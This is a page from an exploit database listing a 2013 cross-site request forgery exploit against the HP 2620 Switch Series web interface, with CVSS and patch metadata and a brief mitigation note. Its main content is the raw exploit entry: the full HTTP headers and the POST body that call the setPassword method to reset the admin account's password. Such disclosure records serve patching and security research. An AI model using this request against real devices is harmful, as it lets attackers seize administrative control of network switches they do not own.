header-logo
Suggest Exploit
vendor:
2620 Switch Series
by:
Hubert GrÄ…dek
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: 2620 Switch Series
Affected Version From: RA.15.05.0006
Affected Version To: ROMRA.15.10
Patch Exists: YES
Related CWE: N/A
CPE: h:hewlett_packard:2620_switch_series
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Hewlett-Packard 2620 Switch Series. Edit Admin Account – CSRF Vulnerability

This vulnerability allows an attacker to change the password of the admin account on the Hewlett-Packard 2620 Switch Series. The vulnerability exists due to insufficient validation of the HTTP request sent to the web server. An attacker can send a specially crafted HTTP request to the web server and change the password of the admin account.

Mitigation:

The vendor has released a patch to address this vulnerability. Additionally, users should ensure that the web server is configured to only accept requests from trusted sources.
Source

Exploit-DB raw data:

# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability
# Date: 26.09.2013r.
# Exploit Author: Hubert GrÄ…dek (PL)
# Software Link: [download link if available]
# Tested on: HP-E2620 24-PoEP //  RA.15.05.0006,ROMRA.15.10

HTTP Headers:

http://[IP_ADDR]/html/json.html

Host: [IP_ADDR]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://[IP_ADDR]/html/nhome.html
Cookie: sessionId=ANYTHING
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache





POST Content:


method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=Manager